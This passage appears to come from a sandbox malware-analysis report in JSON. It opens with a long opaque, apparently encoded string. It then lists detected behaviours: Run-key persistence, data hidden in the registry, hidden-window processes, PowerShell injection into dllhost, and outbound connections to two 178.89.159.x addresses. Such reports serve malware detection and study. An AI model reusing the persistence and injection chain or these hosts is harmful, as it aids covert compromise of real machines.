sO[wV44jtDl#j(q.N_m_sl( aM(\u007faG1\u007f9Deja?\u007f\t4t5qFq4\tV##y.pI2$yq:1d\":,!C_sHHsonjhw|q\u007fs$?sqwj.[Dj![-9.w782\\h4V4a\u007f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\u007ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\tAF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\u007fq*t?o9VCVt%4saZ\u007fMOeI!sHtA}\"Iq]k}3\\2Us9bj\tskt3XZ\u007ff$pgsw_ix^l.yB(js9W+hH*\t0}+}ZHH\u007fjts:21pe`Isj2[\\}og(:M1`pZX\u007fq:[vd&s+\u007f\u007fwUikDw4wo\t4`In.\t}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\u007f5!sT5FAx[2js?Vs3\u007fs}\tpi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\u007fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\tf4Apj$Jljj.H!w#\tws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\t[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\t_m-HwLZlP~5g2%S\u007fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\t?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\u007f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\u007fxA~FygKNy(-js}:IuN2t..i}^B*\u007fVsT9FA$i_N21Gt~piwA5\u007fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\t}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\u007fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\u007fV[njVLhI&2p:V}yCV& 4^o2l^tM?\tV\t\t_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\u007fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\toCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\u007fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\u007fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\u007fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\t1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\t+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\tNN4\u007f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\u007ftNpN$\u007fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\u007f\" to windows startup via registry.", "technique_path": "built_in._persistence._install_startup_script.vmray_install_startup_script_by_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_create_process_with_hidden_window", "operation_desc": "Create process with hidden window", "ref_gfncalls": [ { "ref_id": "gfn_1643", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_process_with_hidden_window", "technique_desc": "The process \"C:\\Windows\\system32\\rundll32.exe\" starts with hidden window.", "technique_path": "built_in._process._create_process_with_hidden_window.vmray_create_process_with_hidden_window", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_create_process_with_hidden_window", "operation_desc": "Create process with hidden window", "ref_gfncalls": [ { "ref_id": "gfn_2594", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_process_with_hidden_window", "technique_desc": "The process \"C:\\Windows\\syswow64\\dllhost.exe\" starts with hidden window.", "technique_path": "built_in._process._create_process_with_hidden_window.vmray_create_process_with_hidden_window", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_create_executable_page", "operation_desc": "Create a page with write and execute permissions", "ref_gfncalls": [ { "ref_id": "gfn_2595", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_allocate_wx_page", "technique_desc": "Allocate a page in a foreign process with \"PAGE_EXECUTE_READWRITE\" permissions, often used to dynamically unpack code.", "technique_path": "built_in._process._create_executable_page.vmray_allocate_wx_page", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_hide_tracks", "category_desc": "Hide Tracks", "operation": "_hide_data_in_registry", "operation_desc": "Write large data into the registry", "ref_gfncalls": [ { "ref_id": "gfn_2713", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hide_data_in_registry", "technique_desc": "Hide 61268 byte in \"HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\".", "technique_path": "built_in._hide_tracks._hide_data_in_registry.vmray_hide_data_in_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "178.89.159.35", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_3821", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"178.89.159.35\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_memory_system", "operation_desc": "Write into memory of another process", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_memory_system", "technique_desc": "\"c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" modifies memory of \"c:\\windows\\syswow64\\dllhost.exe\"", "technique_path": "built_in._injection._modify_memory_system.vmray_modify_memory_system", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_control_flow_system", "operation_desc": "Modify control flow of another process", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_control_flow_system", "technique_desc": "\"c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" alters context of \"c:\\windows\\syswow64\\dllhost.exe\"", "technique_path": "built_in._injection._modify_control_flow_system.vmray_modify_control_flow_system", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_connect", "operation_desc": "Connect to remote host", "ref_gfncalls": [ { "ref_id": "gfn_2723", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_out_connection", "technique_desc": "Outgoing TCP connection to host \"178.89.159.34:80\".", "technique_path": "built_in._network._connect.vmray_tcp_out_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_connect", "operation_desc": "Connect to remote host", "ref_gfncalls": [ { "ref_id": "gfn_3822", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_out_connection", "technique_desc": "Outgoing TCP connection to host \"178.89.159.35:80\".", "technique_path": "built_in._network._connect.vmray_tcp_out_connection", "type": "vti_rule_match", "version": 1 } ], "vti_rule_type": "Default (PE, ...)", "vti_score": 85 }, "yara": { "apply_yara": true, "apply_yara_on_created_files": true, "apply_yara_on_modified_files": true, "apply_yara_on_pcap_file": true, "apply_yara_on_process_dumps": true, "apply_yara_on_sample_files": true, "match_count": 0, "matches": [], "ruleset_count": 7, "type": "yara", "version": 1 } }